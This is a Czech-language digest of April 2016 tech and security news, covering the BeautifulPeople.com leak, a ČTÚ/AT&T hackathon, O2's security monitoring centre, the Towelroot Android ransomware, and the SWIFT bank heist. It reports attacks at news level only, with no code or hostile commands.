Data z BeautifulPeople.com jsou už i na prodej, uvádí to alespoň Troy Hunt, provozovatel užitečné služby haveibeenpwned.com. Ale uvádí také, že neví, kdo je prodává ani jaká je cena. Dobré je, že na výše uvedené službě si přítomnost účtu z BeautifulPeople.com můžete ověřit.
Ve zpřístupněných datech mají být e-maily, telefonní čísla, ale také osobní charakteristiky uživatele, obvyklé u seznamek.
Compromised data: Beauty ratings, Car ownership statuses, Dates of birth, Drinking habits, Education levels, Email addresses, Genders, Geographic locations, Home ownership statuses, Income levels, IP addresses, Job titles, Names, Passwords, Personal descriptions, Personal interests, Physical attributes, Sexual preferences, Smoking habits, Website activity
A jak už to tak chodí, Hunt uvádí, že mezi 1,1 miliony e-mailů je i 170 vládních s doménou .gov. Nepoučitelní lidé se do seznamek stále registrují s pracovními e-maily.
Když český státní úřad a americký operátor AT&T pořádají hackathon
27.4.2016 Zdroj: Lupa.cz Kongresy
Český telekomunikační úřad opět ukázal, že se myšlení zbytku státní správy trochu vymyká a uspořádal vlastní hackathon. Připojil se i obr AT&T.
Viděli jste někdy vysoce postaveného státního úředníka, jak si vezme tričko, dá si pivo a dorazí na hackathon? Český telekomunikační úřad (ČTÚ) pod vedením Jaromíra Nováka opět ukázal, že je ve zdejším státním prostředí tak trochu anomálie. Úřad tento víkend uspořádal CTU and AT&T V4 hackathon.
Akci společně s americkým velvyslancem v Praze Andrew Shapirem otevřel i vicepremiér Pavel Bělobrádek (KDU-ČSL), který se čas od času veřejně k (alespoň slovní) podpoře digitální agendy přihlásí. Jenže jeho řeč mezi liberální internetovou společností působila poněkud zvláštně – v podstatě zde obhajoval nedávno schválené blokování stránek v rámci boje s internetovým hazardem.
Podle mnohých jde o cenzuru. Bělobrádek ale hájí vládní politiku a například v následné malé debatě na Twitteru uvedl, že „cenzura a pravidla jsou něco jiného“.
S penězi od AT&T
Zajímavé je zapojení amerického operátora AT&T, který se stal partnerem hackathonu. AT&T je vnímaný především jako tradiční značka působící na severoamerickém trhu, byznys se službami ale rozvíjí po celém světě a v českém prostředí je zakořeněn poměrně hodně. V takzvaném centru sdílených služeb v Brně pro AT&T pracuje už přes tisíc lidí. Nejde pouze o zaměstnance call centra, ale také techniky a další odborníky.
AT&T z Moravy obsluhuje zákazníky v Evropě, Africe a na Blízkém východě. Z Brna se řeší zejména telekomunikační služby a sítě. Firma má v současné době otevřeny desítky pracovních míst, hledá i specialisty na sítě, storage, Linux či OpenStack.
AT&T na Moravě spolupracuje i se školami a otevřela laboratoře a koncem dubna chystá i den otevřených dveří. Ve své podstatě jde každopádně o tradiční nadnárodní korporaci se všemi výhodami i nevýhodami. Zaměstnanci si pochvalují možnosti růstu, stabilní prostředí či přístup k hardwaru, stěžují si naopak na byrokracii, procesy, limitované růsty platů a podobně.
Americký operátor (proto i účast Shapira na startu) si prostřednictvím hackathonů a podobných akcí buduje povědomí mezi IT komunitou a aktivity tohoto druhu rozvíjí už několik let. Jde i o formu náborové kampaně. Ostatně podobně to dělají mnohé jiné firmy z oboru. AT&T rovněž na hackathonu poskytl vlastní platformu pro internet věcí, konkrétně AT&T M2X, a také poradce.
Zaměření akce je byznysu AT&T blízké. Vývojáři měli k dispozici zařízení typu Arduino či beacony od Kontakt.io, takže se daly rozvíjet i koncepty internetu věcí, hardwarové komunikace a podobně. Tedy něco, co dnes operátory dost zajímá. ČTÚ a americký operátor AT&T se do kontaktu a prvních námluv dostali během předsednictví Česka v rámci V4.
Sám v autobusu
ČTÚ zase od hackathonu očekává rozvoj nových oblastí. „Akce tohoto typu je přesně to, co v současné době region V4 v podpoře inovací potřebuje. Je to báječná příležitost, abychom akcelerovali právě probíhající rozvoj internetu věcí a využití otevřených dat veřejné správy,” věří předseda úřadu Jaromír Novák. Později dodal, že mu hackathon „potvrdil, že tahle země má obrovský potenciál“ a že se nemá promarnit.
Do akce se zapojili také partneři CZ.NIC, Y Soft Ventures a Credo Ventures, dorazil i prezident AT&T pro oblast EMEA Vladimir Slamecka. Zatímco na jiných hackathonech se často za odměnu dává pocit z dobře odvedené práce, přístup k nějaké cloudové platformě, pizza a Red Bull zdarma či nějaké to pěkné tričko, tato akce díky AT&T přinesla na odměnách celkem 15 tisíc dolarů.
Stačilo uspět v jedné ze čtyř oblastí a napsat aplikaci pro chytrá města, open data, vzdělávání nebo open source projekt následně uvolněný pro komunitu. Do pražského hotelu Pyramida nakonec dorazilo odhadem kolek čtyřiceti účastníků několika národností a často tu zněla angličtina.
Deset tisíc dolarů nakonec vyhrála aplikace Babble, která má „vracet lidi od technologií do reálného kontaktu“, zejména v hromadné dopravě. CZ.NIC zase udělil cenu za open source projektu DámeMatiku, který je už k dispozici na GitHubu. Feed dalších fotek a tweetů je možné si vyfiltrovat na Twitteru.
Na návštěvě v bezpečnostním dohledovém centru O2 ITS
27.4.2016 Zdroj: Root.cz Zabezpečení
Společnost O₂ IT Services představila „Security Expert Center“. Jeho službu nabízí nejen těm, kteří spadají pod zákon o kybernetické bezpečnosti, nýbrž komukoli, kdo zpracovává citlivá data.
V úterý 19. dubna otevřela společnost O₂ IT Services formálně svoje komerční dohledové středisko. Na prohlídku pozvala novináře i možné zákazníky.
Běžně jsou podobná centra známa jako SOC — security operations center. Z obchodních důvodů se v O₂ ITS rozhodli pro název „Security Expert Center“, aby bylo zákazníkům už ze zkratky SEC zřejmější, že jde o bezpečnost.
Středisko chystali od loňského března. V provozu je opravdu od počátku prosince a zatím má šest zákazníků. O₂ ITS je ovšem nejmenuje, ale jsou to dílem velké státní instituce (například ministerstva) spadající pod zákon o kybernetické bezpečnosti a dílem zákazníci komerční, a to zatím spíše střední nebo menší.
O₂ ITS sice dodává nebo upravuje také řešení na straně zákazníka, ale SEC je pojato především jako služba za stálý měsíční poplatek. Pro jak malé zákazníky dává smysl? Setkali jsme se i s právními kancelářemi o dvou počítačích, kde se ale spravují důležité smlouvy. Vezmu‑li to na objem dat, chodil by nám od nich tak gigabajt denně a stáli bychom je asi dvacet tisíc měsíčně. Uvážíte‑li, že výstavba vlastního SIEM začíná od dvou miliónů…, odhaduje analytik Petr Tejnský.
SIEM: Security Information and Event Management, tedy řízení informační bezpečnosti a bezpečnostních událostí, vlastně průběžný dohled nad síťovým provozem a sběr záznamů o něm, a možnost analýzy a protiopatření v případě mimořádného jevu, který může znamenat narušení bezpečnosti. (Pojmu SIEM poprvé užil patrně Gartner v roce 2005.)
SEC je prozatím připraven obsloužit asi čtyřicítku zákazníků různé velikosti. Indexovat může celkem 1,7 TB příchozích dat denně (asi sto tisíc EPS, tedy událostí za sekundu). Největší zákazníky vyjde bezpečnostní dohled od SEC zhruba na tři sta tisíc korun měsíčně.
Jak je postaveno
U zákazníka musí být sběrač čili kolektor dat o síťovém provozu a síťových zařízeních. Zpravidla se dodává jako zařízení virtuální (virtual appliance), leč kdyby zákazník neprovozoval žádný virtuální stroj, lze mu dodat sběrač jako hardware. Do uživatelských stanic se zavádějí klientské agenty (podporují Windows a Linux/Unix); ty posílají data do sběrače.
SEC používá ke sběru dat Syslog-ng Premium Edition od Balabitu. Sběr je proti výpadkům zajištěn tříúrovňově: klientské agenty dokáží data podržet po 24 hodin, nemají-li spojení s kolektorem; kolektor je podrží po sedm dní, nemá-li spojení do SEC; v SEC se data ukládají nejméně na tři měsíce, a to zašifrovaně, na důvěryhodném a certifikovaném úložišti, udává Petr Tejnský. Veškerá data jsou časově označena, aby nemohlo dojít k manipulaci; jak to požaduje zákon.
Důležitou výhodou Syslog-ng proti třeba Rsyslog a podobným je řízení datového toku, možnost vyhradit jen určitou šířku pásma, vyzdvihuje Tejnský. Většina útoků způsobí množství zpráv ve velmi krátkém čase, bez řízení toku je snadné zahltit celý řetězec.
Sběrač je se SEC spojen buďto skrze VPN, nebo přes Internet s využitím TLS 1.2. Podle toho, co zákazník požaduje, sděluje Tejnský. TLS 1.2 je, myslím si, v zásadě bezpečné. Kdyby mělo dojít k prolomení TLS, dojde i k prolomení VPN, soudí.
Samo SEC je implementováno v „neveřejném cloudu“. Jeho obsluha však nemusí sedět v té místnosti na fotkách, stačí jim notebook a připojení k internetu. (Přístupová práva řídí Shell Control Box od Balabitu.)
Tým SEC má šest pracovníků a šéfa, zatímco partnerská společnost Axenta poskytuje asi desítku administrátorů a vývojářů; právě ona postavila, spravuje a vyvíjí technické řešení SEC.
Úlohy v týmu SEC
Dva operátoři sledují aktivní kanály a ukazatele, zakládají případy a popisují je; nedokáží‑li sami vyhodnotit, že případ je pouze planým poplachem, předávají ho na analytiky.
Tři analytici, vybaveni analytickými nástroji, doporučují a implementují případná protiopatření.
Expert udržuje a rozšiřuje znalostní databázi — rozpoznává nové případy, rozvíjí stávající. Navrhuje nové korelace, filtry, monitory, aktivní seznamy a kanály, ukazatele a hlášení.
Ve středisku se zatím pracuje osm hodin pět dní v týdnu. Ale někdo na to kouká 24/7, ujišťuje Petr Tejnský. Máme ještě interní dohledové centrum. I analytici mohou být dostupní 24/7, ale zákazníci obvykle požadují řešení bezpečnostních událostí následujícího pracovního dne.
Čtvero základních modulů SEC
Aktivní monitorování všech součástí SEC — jak u zákazníka, tak v datacentru. Na rozpoznávání anomálií je nasazen Flowmon ADS.
Správa logů, tedy posbíraných dat: už výše zmíněný Syslog-ng.
Řízení bezpečnosti. Využíváme HP ArcSight ESM, sděluje Tejnský, a to z toho důvodu, že je nativně multitenantní, umožňuje real‑time korelace bezpečnostních událostí různých typů. To není u SIEM nic nového, ale výhodou ArcSightu je včasná a přesná detekce. Nasazování SIEM běžně způsobí množství planých poplachů, ale ArcSight lze velice rychle naučit, co jsou false positives, lze vymezit různé případy pro různé stavy; plané poplachy se jím dají dost omezit.
ArcSight se dále vyznačuje tím, že má rozsáhlou kategorizaci a normalizaci dat a více než tři sta chytrých konektorů už v sobě: připojíte jakékoli zařízení, které požadujete, podporuje SAP, různé aplikace a pod. ArcSight zkracuje řešení běžných incidentů z hodin na minuty.
Tiketovací systém a zákaznický portál: Provozujeme iTop; je to open‑source. Zvolili jsme ho proto, že podle ITIL je to best practice. Obsahuje konfigurační databázi CMDB s auditem změn; bez CMDB nepostavíte správný SIEM. iTop má flexibilní správu tiketů nebo analýzu dopadů a závislostí — například které další servery budou ovlivněny výpadkem určitého serveru; to oceníte i při údržbě, popisuje Tejnský.
Odpovědnost ze zákona zůstane na zákazníkovi
Spadá‑li zákazník do působnosti zákona o kybernetické bezpečnosti, odpovědnost vyplývající ze zákona zůstává na něm, upozorňuje ředitel Národního centra kybernetické bezpečnosti Vladimír Rohel. Dodává, že pro podobná centra zatím NCKB nezamýšlí žádné certifikace: Nechceme na začátku regulovat trh a nemáme na to ani kapacity, vysvětluje. Různé certifikace však mohou mít jednotliví pracovníci centra.
Postavit pořádné dohledové centrum je velká investice. Je na vás, abyste si vypsali soutěž tak, aby vám z ní nevyšla garážovka, a musíte si dobře sepsat i smlouvu, doporučuje Rohel. Ředitel komerční divize O₂ IT Services Václav Provazník doplňuje: Do našich smluv dáváme, že zajišťujeme soulad se zákonem o kybernetické bezpečnosti.
Sophos nabízí UTM s podporou sandboxingu i pro malé firmy
27.4.2016 Hardware
Novou variantu svého UTM řešení – verzi 9.4 – rozšířil Sophos o technologii sandboxingu a zpřístupňuje ji tak i malým či středním firmám. Kromě toho se v UTM 9.4 objevují i funkce jako WAF, VPN a také nové hardwarové možnosti příslušného zařízení.
Ačkoliv je tradiční zabezpečení proti malware stále klíčovou součástí první linie obrany, není již nadále pro ochranu před moderními útoky dostatečná.
Většina řešení sandboxingu nové generace navržených k odhalování neznámého malware je prý ale příliš složitá a drahá na to, aby o ní mohly malé a střední podniky uvažovat.
Sophos ale představil nástroj Sandstorm, který se dodává formou předplatného. Jde o cloudové řešení, které zajišťuje ochranu proti cíleným útokům, vizibilitu a analýzu právě prostřednictvím technologie sandboxingu.
Další vylepšené funkce firmwaru Sophos UTM 9.4 podle výrobce:
WAF Persistent Session Cookies zvyšuje uživatelský komfort při práci s firemními aplikacemi, které jsou chráněny řešením Sophos UTM s omezením opakovaných výzev k přihlášení.
STAS (Sophos Transparent Authentication Suite) zajišťuje uživatelům sítě spolehlivé a transparentní ověření identity SSO bez nutnosti vlastnit klienta na koncovém bodě. STAS využívá aplikaci v rámci Microsoft Active Directory Server, která sleduje a ukládá případy autentifikace a vyměňuje si tyto informace s UTM, což uživatelům usnadňuje stanovení a vynucování bezpečnostních zásad.
IPv6 SSL VPN Support přidává u řešení UTM podporu konektivity s IPv6 VPN.
ICT technologie mění budoucnost bezpečnosti
27.4.2016 Bezpečnost
Ericsson přišel se studií, která se zabývá problematikou a využitím informačních technologií v souvislosti s budoucností veřejné bezpečnosti. Ke zlepšení efektivity a pruduktivity mohou významnou měrou přispět právě technologie, přičemž základním východiskem je pochopení a řízení systému toku informací.
Klíčovým faktorem výsledku zásahu je vždy čas, který uplyne mezi momentem nahlášení mimořádné události a reálným příjezdem pohotovostních složek. Například ze studie Skotské záchranné služby a Glasgow University vyplynulo, že zkrácení doby odpovědi zdravotní záchranné služby z patnácti na pět minut zdvojnásobilo míru přežití pacientů se srdečním infarktem.
Organizace, jejichž úlohou je zachraňovat životy lidí by mimo jiné měly být schopné koordinovat všechny ostatní složky zapojené do zásahů v případě ohrožení.
„Tuto schopnost podporuje celá škála systémů. Každý z nich je možný implementovat samostatně, ICT technologie však umožňují sdílení informací a zdrojů, což přispěje ke zvýšení jejich efektivity,“ říká Jiří Rynt ze společnosti Ericsson.
Proces vývoje efektivních řešení na bázi ICT začíná u jejich struktury a vychází z úlohy, kterou má organizace plnit. Každý zásah pohotovostních složek sestává z hierarchicky uspořádaných kroků zahrnujících vybavení, systémy nebo lidské zdroje.
Jednotlivé organizace musí individuálně vyhodnotit, jakým způsobem mohou ICT technologie změnit každou úroveň této hierarchie. Patří sem faktory jako jednoduchost a dostupnost zavádění, které by měly vést organizace k využívání řešení založených na otevřených standardech.
Towelroot: Uživatelé starších Androidů v ohrožení
26.4.2016 Android
Útočníci zneužili dříve nevídaným způsobem Towelroot, aby uživatelům starších Androidů do systému v tichosti nainstalovali škodlivý software.
Uživatelé starších verzí Androidu můžou mít problém. Útočníci našli novou fintu, jak jim do systému nainstalovat ransomware z webových stránek se škodlivými reklamami. Podobné útoky vedené skrze prohlížeče nebo jejich plug-iny jsou běžné na počítačích s operačním systémem Windows, nikoliv však na Androidech, kde je bezpečnostní model efektivnější.
Nový drive-by útok teď objevili vývojáři z týmu Blue Coat System, když jejich testovací tablet Samsung běžící s ROMem CyanogenMod 10.1 (postaveném na Androidu 4.2.2) infikoval po návštěvě škodné webové stránky ransomware.
„Tohle je, pokud je mi známo, poprvé, kdy byli útočníci schopni úspěšně nainstalovat škodlivou aplikaci do mobilního zařízení bez jakékoliv interakce nebo přispění uživatele,“ říká Andrew Brandt z Blue Coat. „Zařízení během útoku nezobrazilo standardní box s povolením práv, který normálně instalaci androidové aplikace předchází.“
Další analýza ukázala, že škodlivá reklama obsahovala JavaScript kód, který využil od loňska známé slabiny v knihovně libxslt. Po následném spuštění ELFu s názvem module.so se útočník mohl dostat až k root právům a jejich zneužitím stáhnout a v tichosti nainstalovat APK v podobě ransomwaru známého jako Dogspectus nebo Cyber.Police.
Ten, na rozdíl od jiného ransomwaru, nešifruje soubory, ale namísto toho zobrazí falešné varování (vydávající se za zprávu oficiálních úřadů), že na zařízení byla zjištěna nezákonná aktivita a majitel proto musí zaplatit pokutu. Aplikace zároveň oběti znemožní dělat se zařízením cokoliv dalšího, dokud nezaplatí nebo neprovede tovární reset. Druhá možnost však z telefonu smaže veškeré soubory, je proto lepší se předtím připojit k počítači a zálohovat je.
„Zásadní je, že starší zařízení, která nebyla aktualizována (a nejspíš ani nebudou) posledním Androidem, mohou být vůči této hrozbě zranitelná už napořád,“ uvádí Brandt.
Díra využívající ELFu module.so je ve světě Androidářů už několik měsíců známá jako Towelroot a primárně není škodlivá. Někteří uživatelé ji dokonce účelově využívají k rootování svých zařízení a odblokování některých bezpečnostních opatření či funkcí, které nejsou běžně přístupné.
Jelikož však mohou být snadno zneužity, Google aplikace určené k rootování považuje za potenciálně nebezpečné a jejich instalaci blokuje prostřednictvím funkce Verify Apps (ovládat lze následovně: Google Settings – Security – Scan device for security threats). Nejlepším doporučením je však upgradeování Androida na nejnovější verzi obsahující bezpečnostní patche a vylepšení.
V případě, že už zařízení aktualizace nepodporuje, uživatelé by podle Googlu měli omezit surfování po internetu a místo defaultního anroidího prohlížeče nainstalovat Chrome.
Diskusní server Lapiduch hlásí hack, útočníci zřejmě mají databázi s hesly
26.4.2016 Zdroj: Lupa Hacking
Debatní server je momentálně mimo provoz. Pokud používáte stejné heslo i na jiných webech, změňte si je, doporučují provozovatelé.
„Diskuzní server Lapiduch je momentálně mimo provoz z důvodu narušení bezpečnosti. Domníváme se, že útočník získal databázi uživatelů, obsahující e-mailové adresy a přístupová hesla na Lapiduch,“ informuje momentálně titulní stránka Lapiduch.cz.
Provozovatelé tradičního diskusního serveru rozeslali také e-maily všem uživatelům, kteří na něm měli založené účty.
„Tento mail dostavate proto, ze jste si v minulosti pod touto e-mailovou adresou zalozili ucet na diskuznim serveru lapiduch.cz. Je mozne, ze to bylo jiz opravdu davno, nektere ucty existuji pres 10 let,“ píší ve zprávě.
Všem uživatelům pak doporučují, aby si v případě, že používají stejné heslo i na dalších službách, své přístupové údaje změnili. „Hesla v databázi sice nejsou v otevřeném formátu, ale dá se očekávat, že mohou být prolomena,“ přiznávají.
Zároveň podle nich není jasné, zda server, který má nejlepší leta za sebou, ještě vůbec vstane z popela. „Momentálně debatujeme nad tím kdy, jestli, a v jaké podobě obnovíme provoz,“ píší.
Stránky ČSSD nefungovaly. Může za to DoS útok, říká strana
26.4.2016 Zdroj: Lupa Počítačový útok
Web vládní strany se od noci potýkal s problémy. Teď nejede vůbec. Server podle oficiálního vyjádření vyřadili z provozu neznámí útočníci.
Aktualizováno 11:31: Stránky se po jedenácté hodině dopolední zase rozjely.
Už se to řeší. „Mohu potvrdit snahu jednotlivce nebo skupiny přetížit náš server. Podle našich informací jde o takzvaný DoS útok. Samotný obsah webu by měl zůstat nedotčen a do našeho systému se nikdo neautorizovaný nedostal,“ potvrdil Lupě mluvčí strany Michal Kačírek.
Podle Kačírka teď jejich správce pracuje na tom, aby se web znovu rozjel. „Útočníci neustále mění své IP adresy a servery a my se snažíme zastavit ten proud požadavků na náš server,“ dodává Kačírek.
Po průniku do soukromé e-mailové schránky premiéra Bohuslava Sobotky jde o další internetový útok na vládní ČSSD.
Ochranu mezibankovního systému SWIFT prolomili hackeři, tvrdí firma
25.4.2016 Ochrany
Hackeři, kteří ukradli 81 milionů dolarů z bangladéšské centrální banky, se pravděpodobně dostali i do globálního finančního systému.
Systém, kterým komunikují banky po celém světě, se dosud pozornosti hackerů vyhýbal, ale to už teď neplatí. Podle agentury Reuters byl systém SWIFT při posledním útoku napaden. Tvrdí to prý britský bezpečnostní konzultant, firma BAE Systems.
Cílem útoku byl klient komunikačního systému, v němž má podíl kolem tří tisíc finančních institucí. Jako zbraň zvolili útočníci malware. Podle mluvčí SWIFTu Natashy Deteran by měla firma provozující systém dnes vydat update, který má zalátat objevené díry.
Útok na centrální banku v Bangladéši se snažil z peněžního domu získat 951 milionů dolarů. Většina plateb byla ale zablokována a nakonec se útočníkům povedlo na filipínské účty dostat jen zlomek – 81 milionů. I tak jde ale o zajímavou sumu.
Nový přístup hackerů bude muset zabezpečení v bankách posunout na novou úroveň. Globální systém je prostřednictvím upravených klientů SWIFTU mnohem zranitelnější, než by se mohlo zdát. Přes jeho systém totiž tečou data i komunikace mezi bankami.
Natasha Deteran ještě pro Reuters dodala, že bezpečnostní update by měl zkontrolovat i databáze, jestli v nich nejsou nějaké nesrovnalosti. Podle ní ale útok by neměl mít dopad na samotné jádro služby nebo sítě.
S teorií, že za hackem stojí zmanipulovaný klient SWIFTu označovaný jako Alliance Access, přišlo britské BAE. To chce také během dneška publikovat další detaily na svém blogu.
Dnes SWIFT (Society for Worldwide Interbank Financial Telecommunication) používá kolem jedenácti tisíc bank a institucí po světě. Ne všechny ale využívají Alliance Acces.
Podle bezpečnostních expertů šlo o vysoce profesionální útok. Adrian Nish z BAE tvrdí, že takhle propracovaný model útoku ještě za svou kariéru nepotkal.
Mluvčí bangladéšské banky odmítl zjištění BAE komentovat. A tamní vyšetřovatelé tvrdí, že zatím nenašli žádný malware, který popisuje bezpečnostní firma. Vyšetřování ale ještě nebylo dokončeno.
Policejní vyšetřovatelé ale poukazují na to, že průnik do banky nemusel být nakonec moc složitý, protože zabezpečení banky bylo velmi slabé. Chyběly prý i základní věci jako třeba firewally.
Banka v Bangladéši není podle BAE jediná, na kterou budou mířit podobné útoky. Proto chce firma zveřejnit technické indikátory, které by mohly správce bankovních sítí připravit. A to včetně IP adres egyptského serveru, který útočníci používali k monitorování SWIFTu v bangladéšské bance.
Samotný malware, pojmenovaný evtdiag.exe, byl navržen tak, aby maskoval stopy útočníků přímo v databázi SWIFTu. Podle Nishe je to ale jen součást hackerského toolkitu, který nainstalovali v systému potom, co získali administrátorská práva.
Prohlížeč Opera dostává bezplatné připojení k VPN
25.4.2016 Zabezpečení
Prohlížeč Opera dostává bezplatné připojení k VPNVčera, Milan Šurkala, aktualitaInternetový prohlížeč Opera dostal další zajímavou funkci v podobě VPN připojení zdarma. To umožní zvýšit bezpečnost např. při připojení k veřejné Wi-Fi nebo obcházet regionální omezení různých serverů.
Autoři internetového prohlížeče Opera se nevzdávají a přichází s další, tentokrát dosti netradiční funkcí. Po integraci blokování reklamy bez jakýchkoli plug-inů přichází podpora bezplatného VPN připojení. Zatímco přístupy k VPN serverům jsou obvykle placené, případně jde o VPN zdarma pro pracovní či vzdělávací účely, Opera nabídne možnost využít VPN servery naprosto bezplatně. Není tedy třeba instalovat žádného VPN klienta třetí strany, funkce je nativně v prohlížeči. Důvody pro VPN připojení mohou být různé. Hodí se to např. na veřejných Wi-Fi sítích, kdy šifrování komunikace přes VPN může výrazně zvýšit bezpečnost připojení. VPN se dá ale používat i méně legálně tím, že počítač se pak může tvářit, že je umístěn v jiné zemi a může tak mít přístup k obsahu, který by ale neměl být v dané zemi přístupný.
V minulosti toto řešilo např. BBC u svého iPlayeru, je to ale běžné u drtivé většiny služeb, které mají restrikce v závislosti na tom, kde se nachází počítač, který se snaží k dané službě připojit. Podle statistik VPN použilo nebo používá více než půl miliardy lidí (24 % internetové populace). Důvody jsou např.:
přístup k zábavnému obsahu (38 %)
zvýšení anonymity při procházení internetu (30 %)
zajištění přístupu k omezeným sítím a stránkám ve vlastní zemi (28 %)
zajištění přístupu k podnikové pracovní síti (27 %)
komunikace s rodinou v zahraničí (24 %)
přístup k omezenému novinářskému obsahu ve vlastní zemi (22 %)